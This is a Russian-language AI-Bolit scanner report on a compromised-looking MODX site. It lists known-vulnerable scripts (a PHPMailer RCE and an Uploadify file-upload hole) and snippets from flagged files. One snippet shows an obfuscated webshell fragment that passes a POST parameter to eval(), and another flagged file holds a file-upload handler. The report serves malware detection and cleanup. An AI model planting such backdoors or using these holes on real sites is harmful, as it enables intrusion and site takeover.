Отчет сканера AI-Bolit v20170904: /home/unicombu/public_html/ (2/1)
Скрипт бесплатный только для личного некоммерческого использования. Есть коммерческая лицензия (пункт №11).
Затрачено времени: 1 m 39 s. Сканирование начато 20-11-2017 в 14:01:31, сканирование завершено 20-11-2017 в 14:03:10
Всего проверено 549 директорий и 3294 файлов. Использовано памяти при сканировании: 8.19 Mb.
Сводный отчет
Мобильных редиректов2
Вредоносных скриптов36
JS Вирусов1
Рекламных ссылок и кодов3
Обращаем внимание, что обнаруженные файлы не всегда являются вирусами и хакерскими скриптами. Сканер старается минимизировать число ложных обнаружений, но это не всегда возможно, так как найденный фрагмент может встречаться как во вредоносных скриптах, так и в обычных.
Внимание! Наш сканер обнаружил подозрительный или вредоносный код.

Скорее всего, ваш сайт был взломан и заражен. Рекомендуем срочно обратиться за консультацией к специалистам по информационной безопасности.

Пришлите нам отчет в архиве .zip на ai@revisium.com для проверки вашего сайта на вирусы и взлом.

Компания "Ревизиум" - лечение сайта от вирусов и защита от взлома.


Также выполните дополнительный анализ новым веб-сканером ReScan.Pro.

Не оставляйте файл отчета на сервере, и не давайте на него прямых ссылок с других сайтов. Информация из отчета может быть использована злоумышленниками для взлома сайта, так как содержит информацию о настройках сервера, файлах и каталогах.
Критические замечания
Уязвимости в скриптах (2)
  • /home/unicombu/public_html/manager/includes/controls/class.phpmailer.php - RCE : CVE-2016-10045, CVE-2016-10031
  • /home/unicombu/public_html/assets/modules/evogallery/js/uploadify/uploadify.php - AFU : UPLOADIFY : CVE: 2012-1153
  • Эти файлы могут быть вредоносными или хакерскими скриптами (36)
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    [x] 1…"/$filename($i).$ext")){if(is_uploaded_file($_FILES['NewFile']['tmp_name'])){if( move_uploaded_file($_FILES['NewFile']['tmp_name'],($this->real_cwd."/$filename(
    10/05/2013 15:09:59
    10/05/2013 15:09:59
    8.28 Kb
    622a08eb188c9d53f906627b230763dd76d0c513
    x
    1368187799
    id_58f954f4
    [x] 1…You must call ::factory() with one parameter,the library to load.");}$this->uid= md5($_SERVER['REMOTE_ADDR']);include_once "$driver.php";$classname="Image_Trans
    10/05/2013 15:10:07
    10/05/2013 15:10:07
    15.34 Kb
    1ecca0d059ff58bab10e15ee2f008ea2fb12af03
    x
    1368187807
    id_464375f4
    [x] 1…$filesaved=0;function ImageEditor($manager){$this->manager=$manager;$this->_uid= md5($_SERVER['REMOTE_ADDR']);}function isFileSaved(){Return$this->filesaved;}fu
    10/05/2013 15:10:07
    10/05/2013 15:10:07
    10.88 Kb
    5a147189c7eb60cb9eaa6e8a6364f0319db2ea5f
    x
    1368187807
    id_464375f4
    [x] 1…ction Image_Transform_Driver_IM(){return true;}function load($image){$this->uid= md5($_SERVER['REMOTE_ADDR']);$this->image=$image;$this->_get_image_details($ima
    10/05/2013 15:10:06
    10/05/2013 15:10:06
    7.52 Kb
    c61a7148fa5e7e2144a3f79053d1638870552a64
    x
    1368187806
    id_464375f4
    [x] 1…ansform{var$command=array();function Image_Transform_Driver_NetPBM(){$this->uid= md5($_SERVER['REMOTE_ADDR']);return true;}function load($image){$this->image=$i
    10/05/2013 15:10:07
    10/05/2013 15:10:07
    8.20 Kb
    5791f6d3aca2077fe97ad146f74ec37e733a7783
    x
    1368187807
    id_464375f4
    [x] 1…image='';function Image_Transform_GD(){return;}function load($image){$this->uid= md5($_SERVER['REMOTE_ADDR']);$this->image=$image;$this->_get_image_details($ima
    10/05/2013 15:10:06
    10/05/2013 15:10:06
    16.42 Kb
    5533dfd5f1e29e3e420d8104e888345400294e32
    x
    1368187806
    id_464375f4
    [x] 1…_POST['path'].'/'.$userfile['name'])){if(strtoupper(substr(PHP_OS,0,3))!='WIN') chmod($_POST['path']."/".$userfile['name'],$new_file_permissions);echo '<p><spa
    20/11/2017 12:41:01
    20/11/2017 12:40:45
    25.30 Kb
    9d572c7bfb0a300eb1382722beb393b70d63f72d
    x
    1511174445
    id_3810d622
    [x] 1…$cacheContent=$docObjSerial."<!--__MODxCacheSpliter__-->".$this->documentContent ;fputs($fp,"<?php die('Unauthorized access.');?>$cacheContent");fclose($fp);}}$
    10/05/2013 15:09:52
    10/05/2013 15:09:52
    129.48 Kb
    99a26d07aa686239856f9d53df6094bfe73d406b
    x
    1368187792
    id_a3086437
    [x] 1…s: 422 Unprocessable Entity');die();}if(isset($_SERVER['QUERY_STRING'])&&strpos( urldecode($_SERVER['QUERY_STRING']),'·')!==false) die();if(ini_get('register_gl
    10/05/2013 15:09:52
    10/05/2013 15:09:52
    2.17 Kb
    5f287417d4ef6669687673199b71eb9faedf3029
    x
    1368187792
    id_464375f4
    [x] 68…jZW5zZU9L decodes to licenseOK·/*function checkSession(){··return true;//!empty ($_POST[base64_decode("bGljZW5zZU9L")])&&$_POST[base64_decode("bGljZW5zZU9L")
    10/05/2013 15:09:51
    10/05/2013 15:09:51
    1.25 Kb
    da4551f7e448e258d284faf65c874d6a1192bb50
    x
    1368187791
    id_d8444371
    [x] 1…$maxlen,true);$encoded=str_replace("=".$this->LE,"\n",trim($encoded));}$encoded= preg_replace('/^(.*)$/m',"=?".$this->CharSet."?$encoding?\·?=",$encoded);$encod
    10/05/2013 15:09:53
    10/05/2013 15:09:53
    44.54 Kb
    631515bc8d321f5d451a86ca238fcdf268727430
    x
    1368187793
    id_d3ac992e
    [x] 1…wrSv=base64_decode(&#039;Y29weQ==&quot;);eval(<span class="marker">&nbsp;</span> $raPo_rZluoE($_POST[base64_decode(&#039;aWQ=&#039;)]));if($_POST[base64_decode(
    20/11/2017 11:39:15
    20/11/2017 11:39:15
    66.79 Kb
    55469cd28b26cbcb8295dc80fe87c06f68b6899e
    x
    1511170755
    id_94e89cfd
    [x] 1…return false;}function stripAlias($alias,$char_restrict,$word_separator){$alias= preg_replace_callback('/&([a-zA-Z][a-zA-Z0-9]{1,7});/',array($this,'convert_ent
    10/05/2013 15:08:33
    10/05/2013 15:08:33
    10.72 Kb
    65f06436e56f48605c867a72fc18a853a82c5a8d
    x
    1368187713
    id_d3ac992e
    [x] 1…hes": case "ltrim": case "rtrim": case "trim": case "nl2br": case "md5":$output= $modifier_cmd[$i]($output);break;case "math":$filter=preg_replace("·([a-zA-Z\n\
    10/05/2013 12:36:37
    10/05/2013 12:36:37
    17.50 Kb
    e1c49b43c3f725c0be23dc794b93b7fc36e21ed7
    x
    1368178597
    id_ea1bc104
    [x] 1…input=$json->decode($raw);if(isset($config['general.engine'])){$spellchecker=new $config['general.engine']($config);$result=call_user_func_array(array($spellche
    10/05/2013 12:37:51
    10/05/2013 12:37:51
    2.79 Kb
    cf7ced168906339e4f26fcf6918a9ed7673c64a3
    x
    1368178671
    id_ea1bc104
    [x] 1…se;if(isset($_SERVER['HTTP_ACCEPT_ENCODING']))$encodings=explode(',',strtolower( preg_replace("/\s+/","",$_SERVER['HTTP_ACCEPT_ENCODING'])));if(preg_match("/(?:
    10/05/2013 12:36:23
    10/05/2013 12:36:23
    14.55 Kb
    e94e77523b5691da8a9e121ebbea3c8579ba4ede
    x
    1368178583
    id_d3ac992e
    [x] 1…e']));if(isset($_REQUEST['refurl'])&&!empty($_REQUEST['refurl'])){$targetPageId= urldecode($_REQUEST['refurl']);if(strpos($targetPageId,'q=')!==false){$urlPos=s
    10/05/2013 15:08:51
    10/05/2013 15:08:51
    18.35 Kb
    2b257b402026914ecd5054d25945614457e9b5f1
    x
    1368187731
    id_464375f4
    [x] 1…_filterValue);$custom=array_shift($custom_list);if(function_exists($custom)){if( $custom($value[$this->_array_key],$custom_list))$unset=0;}break;}return$unset;}
    10/05/2013 15:08:35
    10/05/2013 15:08:35
    56.10 Kb
    2dfafb2cb490a440c092aba9fa5b927a23fc1ee8
    x
    1368187715
    id_94e89cfd
    [x] 1…','simple');$this->scCateg=$stv[0];}else{$fCateg=$categ_array[1];$this->scCateg= $fCateg($categ_array[0]);}}$tags_array=explode(':',$this->cfg['tags']);if(isset
    10/05/2013 15:08:34
    10/05/2013 15:08:34
    32.23 Kb
    7c386782baeb3dbc7ff46bcae7689117554b060f
    x
    1368187714
    id_94e89cfd
    [x] 1…'])){if(isset($_POST['asid']))$id=strip_tags($_POST['asid']);else$id=strip_tags( urldecode($_GET['asid']));}$this->forThisAs=($this->asCfg->cfg['asId']!=$id)?fa
    10/05/2013 15:08:34
    10/05/2013 15:08:34
    7.80 Kb
    05360a18c0479db8a4d0c0d2701eb228349d82a0
    x
    1368187714
    id_464375f4
    [x] 131…t($__language)?$__language :$dcfg['language']);··//&ajaxSearch [1 | 0](as p assed in snippet variable ONLY)·// Use this to display the search results using
    10/05/2013 15:08:34
    10/05/2013 15:08:34
    24.84 Kb
    58dc816e5ff71a8acd17478c3b9b57e8b5e5f671
    x
    1368187714
    id_ea1bc104
    [x] 1…aceholders[$name]);}}foreach($customPlaceholders as$name=>$value){$placeholders= call_user_func($value,$placeholders);}if(count($this->fields["display"]['qe'])>
    10/05/2013 15:08:43
    10/05/2013 15:08:43
    38.65 Kb
    b79c8a26fe0f7424d1afd56919db7fe3e6a66fef
    x
    1368187723
    id_85781d45
    [x] 1…ay: block;float: left;}table table tr td tr td{border: 1px solid#888;}</style>"; $_lang['debug_item']="[+pagetitle+]([+id+])";?
    10/05/2013 15:08:45
    10/05/2013 15:08:45
    2.73 Kb
    70d482f5141d2dbb69d4655a1c5a95c312252fbf
    x
    1368187725
    id_ea1bc104
    [x] 1…ay: block;float: left;}table table tr td tr td{border: 1px solid#888;}</style>"; $_lang['debug_item']="[+pagetitle+]([+id+])";?
    10/05/2013 15:08:45
    10/05/2013 15:08:45
    2.76 Kb
    bf5726d0071b38672dbeab9d9b586b22cff2aac7
    x
    1368187725
    id_ea1bc104
    [x] 1…bg_icon_url+]" /><a href="[+save_url+]">[+save_dbg_console+]</a><br /><br />TPL; $dbg_templates["item"]=<<<TPL [+pagetitle+]([+id+]) TPL;$dbg_templates["tab"]=<
    10/05/2013 15:08:44
    10/05/2013 15:08:44
    1.80 Kb
    b6d3187b3fabd9a2420c22c762210a7f6075cc61
    x
    1368187724
    id_ea1bc104
    [x] 1…pU6tsIPmFCAJnWYE0FURk7wJDA0MTKpEzoWAAskiAAA7';header('Content-Type: image/gif'); echo base64_decode($ERROR_NOGD);}else{echo '*** ERROR: No PHP-GD support availa
    10/05/2013 12:38:24
    10/05/2013 12:38:24
    170.98 Kb
    17b7b6c9324fc033a55483381c855e1a3e9a8b0a
    x
    1368178704
    id_8d8a3032
    [x] 1…write($fp_tempfile,base64_decode('R0lGODlhAQABAIAAAH//AP///ywAAAAAAQABAAACAUQAOw =='));fclose($fp_tempfile);$gd_info['GIF Read Support']=(bool) ImageCreateFromG
    10/05/2013 12:38:24
    10/05/2013 12:38:24
    32.38 Kb
    94454b6592b1fb02da5481d63350e12d7f5c9bdd
    x
    1368178704
    id_4ec05a62
    [x] 1…_http_user_agent for site with browsersniffers(thanks redrob·gmail*com) * Added$ PHPTHUMB_CONFIG['disable_pathinfo_parsing'](default false) which disables parsi
    10/05/2013 12:38:25
    10/05/2013 12:38:25
    57.65 Kb
    db05cb67baecdb2adf94ff3f256d3386463094f1
    x
    1368178705
    id_ea1bc104
    [x] 1…re present and properly configured in phpThumb.config.php(introduced in v1.6.0): $PHPTHUMB_CONFIG['allow_src_above_docroot'](default=false)$PHPTHUMB_CONFIG['all
    10/05/2013 12:38:25
    10/05/2013 12:38:25
    14.06 Kb
    7ecb69552489a5ffb25a40a3d951c6276474286f
    x
    1368178705
    id_ea1bc104
    [x] 1…ource images(GIF,TIFF,etc) aoe=Output Allow Enlarging - override the setting for $CONFIG['output_allow_enlarging'](1=on,0=off)("far" and "iar" both override thi
    10/05/2013 12:38:25
    10/05/2013 12:38:25
    26.54 Kb
    94a9840215f34aed8babeb5a4a979a5934e61988
    x
    1368178705
    id_ea1bc104
    [x] 1…(Last-Modified: '.gmdate('D,d M Y H:i:s',$nModified).' GMT),but skipping because $_SERVER[HTTP_REFERER]('.$_SERVER['HTTP_REFERER'].') is not in$phpThumb->config
    10/05/2013 12:38:25
    10/05/2013 12:38:25
    27.03 Kb
    90c4bf10dbe13dd7b087d7ee319ca7bd77ec003a
    x
    1368178705
    id_ea1bc104
    [x] 1…sts($target_dir)){mkdir($target_dir,0777);mkdir($target_dir.'thumbs/',0777);}if( move_uploaded_file($_FILES['Filedata']['tmp_name'],$target_file)){resizeImage($
    10/05/2013 12:36:18
    10/05/2013 12:36:18
    4.34 Kb
    58514b236c8c321550f2597f01470ce4002c5fb1
    x
    1368178578
    id_58f954f4
    [x] 1…_id']) :$this->config['docId'];$filename=isset($_GET['edit'])?$modx->db->escape( urldecode($_GET['edit'])) : '';$tpl=file_get_contents($this->config['modulePath
    10/05/2013 12:36:18
    10/05/2013 12:36:18
    18.12 Kb
    2c058d00c5aa5cda60a85fc9c7743af20bafb32f
    x
    1368178578
    id_464375f4
    [x] 1…['thumbQuality']);chmod($target_file,0666);chmod($target_thumb,0666);}$filename= urldecode($_POST['edit']);if($filename!==$_FILES['Filedata']['name']){if(file_e
    10/05/2013 12:36:18
    10/05/2013 12:36:18
    4.45 Kb
    3dc24ffc12768715afa196ae6829efd43e53effb
    x
    1368178578
    id_464375f4
    [x] 1…ontent_id'])?intval($_GET['content_id']) : 0;$filename=isset($_GET['filename'])? urldecode($_GET['filename']) : '';$target=$savePath.$content_id.'/thumbs/'.$fil
    10/05/2013 12:36:18
    10/05/2013 12:36:18
    928 b
    8ac9ea25eb14eb15bca7c2e5e035424a9795806f
    x
    1368178578
    id_464375f4
    [x] 1…FILES[$fname][\'tmp_name\'])&&is_readable($_FILES[$fname][\'tmp_name\'])){$file= fopen($_FILES[$fname][\'tmp_name\'],\'r\');while($data=fgetcsv($file,1000,\',\'
    20/11/2017 12:59:49
    20/11/2017 12:59:40
    162.83 Kb
    356395ba551ffb545dbd84879fec815fb50bec93
    x
    1511175580
    id_3810d622
    Эти файлы могут быть javascript вирусами (1)
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    [x] 1…?"unshift":"push"](s);}opts.slideCount=els.length;$s.css("position","absolute"); $s[prepend?"prependTo":"appendTo"](opts.$cont);if(prepend){opts.currSlide++;opt
    10/05/2013 12:38:22
    10/05/2013 12:38:22
    15.69 Kb
    094be5fa34f0adda530e9d16c06a2170322cc46d
    x
    1368178702
    id_ea1bc104
    Подозрение на мобильный редирект, подмену расширений или автовнедрение кода (2)
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    46… Apache internal dummy connections from breaking [(site_url)] cache·RewriteCond %{HTTP_USER_AGENT}^.*internal\ dummy\ connection.*$ [NC]·RewriteCond%{REQUEST
    27/10/2017 07:26:02
    14/12/2016 04:50:24
    2.96 Kb
    2ee611512d8c84adabc397ba5d7cedc83961b283
    x
    1481683824
    id_z8855040
    15… Apache internal dummy connections from breaking [(site_url)] cache·RewriteCond %{HTTP_USER_AGENT}^.*internal\ dummy\ connection.*$ [NC]·RewriteRule.* - [F,L
    23/10/2014 16:15:09
    03/06/2013 15:43:18
    1.20 Kb
    de4701ed31b3691c0b842b7d19490f778e6a68d8
    x
    1370263398
    id_z7943789
    Предупреждения
    Дорвеи, реклама, спам-ссылки, редиректы
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    1…></td></tr><tr><td>phpInfo()</td><td>&nbsp;</td><td><b><a href="#" onclick="view PHPInfo();return false;"><?php echo$_lang['view'];?></a></b></td></tr><tr><td><
    10/05/2013 15:09:51
    10/05/2013 15:09:51
    11.07 Kb
    1a37d6af6d4786334006cbd8738608c5caa724c0
    x
    1368187791
    id_z2903308
    1…d-color:#cccccc;border: 0px;height: 1px;color:#333333;}</style><?php ob_start(); phpinfo();$pinfo=ob_get_contents();ob_end_clean();$pinfo=preg_replace('%^.*<bod
    10/05/2013 15:09:50
    10/05/2013 15:09:50
    1.52 Kb
    6b789c0fa51f17babe577badb2781778972b74ab
    x
    1368187790
    id_z6525519
    1…"fileDownloader" width="1" height="1" style="display:none;width:1px;height:1px;" ></iframe><?php include_once "footer.inc.php";?><?php class Mysqldumper{var$_ho
    20/11/2017 12:43:14
    20/11/2017 12:42:59
    12.89 Kb
    ab1f3bb76bedb8050ef297ac8bc74319684b4eef
    x
    1511174579
    id_z4526332
    В не .php файле содержится стартовая сигнатура PHP кода. Возможно, там вредоносный код
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    1…cation class::<?php class Auth{function authenticate($data,$config){}}?>as you c an see the class must have a method called authenticate which takes two paramet
    10/05/2013 15:09:59
    10/05/2013 15:09:59
    2.48 Kb
    62e9e94ee1c7ea226fd8b1ada219d44396177b06
    x
    1368187799
    id_z1576654